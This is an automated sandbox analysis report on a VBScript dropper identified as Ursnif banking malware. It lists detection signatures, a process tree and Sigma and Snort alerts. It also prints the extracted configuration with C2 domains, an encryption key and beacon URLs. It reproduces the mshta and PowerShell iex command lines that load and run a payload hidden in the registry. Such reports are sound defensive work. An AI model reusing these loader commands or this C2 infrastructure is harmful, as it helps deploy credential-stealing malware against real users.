Loading ...

Play interactive tourEdit tour

Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name:345678.vbs
Analysis ID:481077
MD5:9e6b216f5112b583f035ac621c78ea4e
SHA1:8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256:cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3868 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6000 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6072 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2896 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 4612 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • WmiPrvSE.exe (PID: 6716 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 6556 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7060 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7080 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3208 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 6256 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
    00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 36 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.3.rundll32.exe.50ba4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              21.3.rundll32.exe.50ba4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                21.3.rundll32.exe.5168d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  21.3.rundll32.exe.51394a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Encoded IEXShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6948, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline', ProcessId: 7060
                    Sigma detected: Suspicious Rundll32 ActivityShow sources
                    Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2896, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4612
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132757666291999114.6948.DefaultAppDomain.powershell

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell run code from registryShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6556, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6948

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/eAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/tAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMwAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyTAvira URL Cloud: Label: malware
                    Found malware configurationShow sources
                    Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
                    Uses nslookup.exe to query domainsShow sources
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
